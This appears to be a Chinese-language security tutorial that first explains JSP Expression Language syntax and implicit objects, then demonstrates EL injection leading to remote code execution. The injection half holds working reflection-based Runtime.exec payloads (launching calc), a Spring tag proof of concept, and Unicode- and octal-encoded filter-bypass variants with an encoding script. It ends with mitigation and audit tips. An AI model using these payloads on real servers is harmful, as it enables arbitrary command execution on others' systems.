EL(Expression Language) 是为了使JSP写起来更加简单。表达式语言的灵感来自于 ECMAScript 和 XPath 表达式语言,它提供了在 JSP 中简化表达式的方法,让Jsp的代码更加简化。
EL表达式主要功能如下:
${user==null}
;在JSP中访问模型对象是通过EL表达式的语法来表达。所有EL表达式的格式都是以${}
表示。例如,${ userinfo}
代表获取变量userinfo的值。当EL表达式中的变量不给定范围时,则默认在page范围查找,然后依次在request、session、application范围查找。也可以用范围作为前缀表示属于哪个范围的变量,例如:${ pageScope. userinfo}
表示访问page范围中的userinfo变量。
简单地说,使用EL表达式语法:${EL表达式}
其中,EL表达式和JSP代码等价转换。事实上,可以将EL表达式理解为一种简化的JSP代码。
扩展JSP代码的写法总结:
JSP表达式:<%=变量或表达式>
向浏览器输出变量或表达式的计算结果。
JSP脚本:<%Java代码%>
执行java代码的原理:翻译到_jspService()方法中。
JSP声明:<%!变量或方法%>
声明jsp的成员变量或成员方法。
JSP注释:<%!--JSP注释--%>
用于注释JSP代码,不会翻译到Java文件中,也不会执行。
EL表达式提供.
和[]
两种运算符来存取数据。
当要存取的属性名称中包含一些特殊字符,如.
或-
等并非字母或数字的符号,就一定要使用[]
。例如:${user.My-Name}
应当改为${user["My-Name"]}
。
如果要动态取值时,就可以用[]
来做,而.
无法做到动态取值。例如:${sessionScope.user[data]}
中data 是一个变量。
EL表达式存取变量数据的方法很简单,例如:${username}
。它的意思是取出某一范围中名称为username的变量。因为我们并没有指定哪一个范围的username,所以它会依序从Page、Request、Session、Application范围查找。假如途中找到username,就直接回传,不再继续找下去,但是假如全部的范围都没有找到时,就回传""。EL表达式的属性如下:
属性范围在EL中的名称 | |
---|---|
Page | PageScope |
Request | RequestScope |
Session | SessionScope |
Application | ApplicationScope |
JSP表达式语言定义可在表达式中使用的以下文字:
文字 | 文字的值 |
---|---|
Boolean | true 和 false |
Integer | 与 Java 类似。可以包含任何整数,例如 24、-45、567 |
Floating Point | 与 Java 类似。可以包含任何正的或负的浮点数,例如 -1.8E-45、4.567 |
String | 任何由单引号或双引号限定的字符串。对于单引号、双引号和反斜杠,使用反斜杠字符作为转义序列。必须注意,如果在字符串两端使用双引号,则单引号不需要转义。 |
Null | null |
JSP表达式语言提供以下操作符,其中大部分是Java中常用的操作符:
术语 | 定义 |
---|---|
算术型 | +、-(二元)、*、/、div、%、mod、-(一元) |
逻辑型 | and、&&、or、双管道符、!、not |
关系型 | ==、eq、!=、ne、<、lt、>、gt、<=、le、>=、ge。可以与其他值进行比较,或与布尔型、字符串型、整型或浮点型文字进行比较。 |
空 | empty 空操作符是前缀操作,可用于确定值是否为空。 |
条件型 | A ?B :C。根据 A 赋值的结果来赋值 B 或 C。 |
JSP表达式语言定义了一组隐式对象,其中许多对象在 JSP scriplet 和表达式中可用:
术语 | 定义 |
---|---|
pageContext | JSP页的上下文,可以用于访问 JSP 隐式对象,如请求、响应、会话、输出、servletContext 等。例如,${pageContext.response} 为页面的响应对象赋值。 |
此外,还提供几个隐式对象,允许对以下对象进行简易访问:
术语 | 定义 |
---|---|
param | 将请求参数名称映射到单个字符串参数值(通过调用 ServletRequest.getParameter (String name) 获得)。getParameter (String) 方法返回带有特定名称的参数。表达式${param . name} 相当于 request.getParameter (name)。 |
paramValues | 将请求参数名称映射到一个数值数组(通过调用 ServletRequest.getParameter (String name) 获得)。它与 param 隐式对象非常类似,但它检索一个字符串数组而不是单个值。表达式 ${paramvalues. name} 相当于 request.getParamterValues(name)。 |
header | 将请求头名称映射到单个字符串头值(通过调用 ServletRequest.getHeader(String name) 获得)。表达式 ${header. name} 相当于 request.getHeader(name)。 |
headerValues | 将请求头名称映射到一个数值数组(通过调用 ServletRequest.getHeaders(String) 获得)。它与头隐式对象非常类似。表达式${headerValues. name} 相当于 request.getHeaderValues(name)。 |
cookie | 将 cookie 名称映射到单个 cookie 对象。向服务器发出的客户端请求可以获得一个或多个 cookie。表达式${cookie. name .value} 返回带有特定名称的第一个 cookie 值。如果请求包含多个同名的 cookie,则应该使用${headerValues. name} 表达式。 |
initParam | 将上下文初始化参数名称映射到单个值(通过调用 ServletContext.getInitparameter(String name) 获得)。 |
除了上述两种类型的隐式对象之外,还有些对象允许访问多种范围的变量,如 Web 上下文、会话、请求、页面:
术语 | 定义 |
---|---|
pageScope | 将页面范围的变量名称映射到其值。例如,EL 表达式可以使用${pageScope.objectName} 访问一个 JSP 中页面范围的对象,还可以使用${pageScope .objectName. attributeName} 访问对象的属性。 |
requestScope | 将请求范围的变量名称映射到其值。该对象允许访问请求对象的属性。例如,EL 表达式可以使用${requestScope. objectName} 访问一个 JSP 请求范围的对象,还可以使用${requestScope. objectName. attributeName} 访问对象的属性。 |
sessionScope | 将会话范围的变量名称映射到其值。该对象允许访问会话对象的属性。例如:${sessionScope. name} |
applicationScope | 将应用程序范围的变量名称映射到其值。该隐式对象允许访问应用程序范围的对象。 |
pageContext对象是JSP中pageContext对象的引用。通过pageContext对象,您可以访问request对象。比如,访问request对象传入的查询字符串,就像这样:
${pageContext.request.queryString}
pageScope,requestScope,sessionScope,applicationScope变量用来访问存储在各个作用域层次的变量。
举例来说,如果您需要显式访问在applicationScope层的box变量,可以这样来访问:applicationScope.box。
<% pageContext.setAttribute("name","mi1k7ea_page"); request.setAttribute("name","mi1k7ea_request"); session.setAttribute("user","mi1k7ea_session"); application.setAttribute("user","mi1k7ea_application"); %> pageScope.name:${pageScope.name} </br> requestScope.name : ${requestScope.name} </br> sessionScope.user : ${sessionScope.user} </br> applicationScope.user : ${applicationScope.user}
param和paramValues对象用来访问参数值,通过使用request.getParameter方法和request.getParameterValues方法。
举例来说,访问一个名为order的参数,可以这样使用表达式:${param.order},或者${param["order"]}。
接下来的例子表明了如何访问request中的username参数:
<%@ page import="java.io.*,java.util.*" %> <% String title = "Accessing Request Param"; %> <html> <head> <title><% out.print(title); %></title> </head> <body> <center> <h1><% out.print(title); %></h1> </center> <div align="center"> <p>${param["username"]}</p> </div> </body> </html>
param对象返回单一的字符串,而paramValues对象则返回一个字符串数组。
header和headerValues对象用来访问信息头,通过使用request.getHeader()方法和request.getHeaders()方法。
举例来说,要访问一个名为user-agent的信息头,可以这样使用表达式:${header.user-agent}
,或者${header["user-agent"]}
。
接下来的例子表明了如何访问user-agent信息头:
<%@ page import="java.io.*,java.util.*" %> <% String title = "User Agent Example"; %> <html> <head> <title><% out.print(title); %></title> </head> <body> <center> <h1><% out.print(title); %></h1> </center> <div align="center"> <p>${header["user-agent"]}</p> </div> </body> </html>
运行结果如下:
header对象返回单一值,而headerValues则返回一个字符串数组。
EL允许您在表达式中使用函数。这些函数必须被定义在自定义标签库中。函数的使用语法如下:
${ns:func(param1, param2, ...)}
ns指的是命名空间(namespace),func指的是函数的名称,param1指的是第一个参数,param2指的是第二个参数,以此类推。比如,有函数fn:length,在JSTL库中定义,可以像下面这样来获取一个字符串的长度:
${fn:length("Get my length")}
要使用任何标签库中的函数,您需要将这些库安装在服务器中,然后使用<taglib>
标签在JSP文件中包含这些库。
看个例子即可。
先新建一个ELFunc类,其中定义的doSomething()函数用于给输入的参数字符拼接".com"形成域名返回:
package eltest; public class ELFunc { public static String doSomething(String str){ return str + ".com"; } }
接着在WEB-INF文件夹下(除lib和classess目录外)新建test.tld文件,其中指定执行的Java方法及其URI地址:
<?xml version="1.0" encoding="UTF-8"?> <taglib version="2.0" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-jsptaglibrary_2_0.xsd"> <tlib-version>1.0</tlib-version> <short-name>ELFunc</short-name> <uri>http://www.mi1k7ea.com/ELFunc</uri> <function> <name>doSomething</name> <function-class>eltest.ELFunc</function-class> <function-signature> java.lang.String doSomething(java.lang.String)</function-signature> </function> </taglib>
JSP文件中,先头部导入taglib标签库,URI为test.tld中设置的URI地址,prefix为test.tld中设置的short-name,然后直接在EL表达式中使用类名:方法名()
的形式来调用该类方法即可:
<%@taglib uri="http://www.mi1k7ea.com/ELFunc" prefix="ELFunc"%> ${ELFunc:doSomething("mi1k7ea")}
web.xml中进入如下配置:
<jsp-config> <jsp-property-group> <url-pattern>*.jsp</url-pattern> <el-ignored>true</el-ignored> </jsp-property-group> </jsp-config>
在JSP文件中可以有如下定义:
<%@ page isELIgnored="true" %>
该语句表示是否禁用EL表达式,TRUE表示禁止,FALSE表示不禁止。
JSP2.0中默认的启用EL表达式。
例如如下的JSP代码禁用EL表达式:
<%@ page isELIgnored="true" %> ${pageContext.request.queryString}
EL表达式注入漏洞和SpEL、OGNL等表达式注入漏洞是一样的漏洞原理的,即表达式外部可控导致攻击者注入恶意表达式实现任意代码执行。
一般的,EL表达式注入漏洞的外部可控点入口都是在Java程序代码中,即Java程序中的EL表达式内容全部或部分是从外部获取的。
//对应于JSP页面中的pageContext对象(注意:取的是pageContext对象)
${pageContext}
//获取Web路径
${pageContext.getSession().getServletContext().getClassLoader().getResource("")}
//文件头参数
${header}
//获取webRoot
${applicationScope}
//执行命令
${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("calc").getInputStream())}
比如我们在Java程序中可以控制输入EL表达式如下:
${pageContext.setAttribute("a","".getClass().forName("java.lang.Runtime").getMethod("exec","".getClass()).invoke("".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null),"calc.exe"))}
如果该EL表达式直接在JSP页面中执行,则触发任意代码执行漏洞:
但是在实际场景中,是几乎没有也无法直接从外部控制JSP页面中的EL表达式的。而目前已知的EL表达式注入漏洞都是框架层面服务端执行的EL表达式外部可控导致的。
命令执行PoC如下:
<spring:message text= "${/"/".getClass().forName(/"java.lang.Runtime/").getMethod(/"getRuntime/",null).invoke(null,null).exec(/"calc/",null).toString()}"> </spring:message>
再比如:
<%@ taglib uri="http://www.springframework.org/tags" prefix="spring"%> <spring:message text="${param.a}"></spring:message>
访问http://localhost/XXX.jsp?a=$](https://links.jianshu.com/go?to=http%3A%2F%2Flocalhost%2FXXX.jsp%3Fa%3D%24){applicationScope}
。
容器第一次执行EL表达式${param.a}
获得了我们输入的${applicationScope}
,然后Spring标签获取容器的EL表达式求值对象,把${applicationScope}
再次执行掉,形成了漏洞。
参考Wooyun镜像上的案例:
下面我们直接看下在Java代码中EL表达式注入的场景是怎么样的。
EL曾经是JSTL的一部分。然后,EL进入了JSP 2.0标准。现在,尽管是JSP 2.1的一部分,但EL API已被分离到包javax.el中, 并且已删除了对核心JSP类的所有依赖关系。换句话说:EL已准备好在非JSP应用程序中使用!
也就是说,现在EL表达式所依赖的包javax.el等都在JUEL相关的jar包中。
JUEL(Java Unified Expression Language)是统一表达语言轻量而高效级的实现,具有高性能,插件式缓存,小体积,支持方法调用和多参数调用,可插拔多种特性。
更多参考官网:http://juel.sourceforge.net/
需要的jar包:juel-api-2.2.7、juel-spi-2.2.7、juel-impl-2.2.7。
Test.java,利用反射调用Runtime类方法实现命令执行:
import de.odysseus.el.ExpressionFactoryImpl; import de.odysseus.el.util.SimpleContext; import javax.el.ExpressionFactory; import javax.el.ValueExpression; public class Test { public static void main(String[] args) { ExpressionFactory expressionFactory = new ExpressionFactoryImpl(); SimpleContext simpleContext = new SimpleContext(); // failed // String exp = "${''.getClass().forName('java.lang.Runtime').getRuntime().exec('calc')}"; // ok String exp = "${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'calc.exe')}"; ValueExpression valueExpression = expressionFactory.createValueExpression(simpleContext, exp, String.class); System.out.println(valueExpression.getValue(simpleContext)); } }
运行即触发:
这里针对前面在Java代码中注入EL表达式的例子来演示。其实绕过方法和SpEL表达式注入是一样的。
即前面Demo的PoC,注意一点的就是这里不支持用字符串拼接的方式绕过关键字过滤。
同SpEL注入中讲到的:
${''.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("JavaScript").eval("java.lang.Runtime.getRuntime().exec('calc')")}
对可利用的PoC进行全部或部分的Unicode编码都是OK的:
// Unicode编码内容为前面反射调用的PoC
\u0024\u007b\u0027\u0027\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0027\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0027\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0027\u0065\u0078\u0065\u0063\u0027\u002c\u0027\u0027\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0027\u0027\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0027\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0027\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0027\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0027\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006e\u0075\u006c\u006c\u0029\u002c\u0027\u0063\u0061\u006c\u0063\u002e\u0065\u0078\u0065\u0027\u0029\u007d
同上,全部或部分进行八进制编码都是OK的:
// 八进制编码内容为前面反射调用的PoC
\44\173\47\47\56\147\145\164\103\154\141\163\163\50\51\56\146\157\162\116\141\155\145\50\47\152\141\166\141\56\154\141\156\147\56\122\165\156\164\151\155\145\47\51\56\147\145\164\115\145\164\150\157\144\50\47\145\170\145\143\47\54\47\47\56\147\145\164\103\154\141\163\163\50\51\51\56\151\156\166\157\153\145\50\47\47\56\147\145\164\103\154\141\163\163\50\51\56\146\157\162\116\141\155\145\50\47\152\141\166\141\56\154\141\156\147\56\122\165\156\164\151\155\145\47\51\56\147\145\164\115\145\164\150\157\144\50\47\147\145\164\122\165\156\164\151\155\145\47\51\56\151\156\166\157\153\145\50\156\165\154\154\51\54\47\143\141\154\143\56\145\170\145\47\51\175
这里我是通过写个小脚本来实现编码转换的:
str = "${''.getClass().forName('java.lang.Runtime').getMethod('exec',''.getClass()).invoke(''.getClass().forName('java.lang.Runtime').getMethod('getRuntime').invoke(null),'calc.exe')}" result = "" for s in str: num = "\\" + oct(ord(s)) result += num print(result.replace("\\0", "\\"))
尽量不使用外部输入的内容作为EL表达式内容;
若使用,则严格过滤EL表达式注入漏洞的payload关键字;
如果是排查Java程序中JUEL相关代码,则搜索如下关键类方法:
javax.el.ExpressionFactory.createValueExpression()
javax.el.ValueExpression.getValue()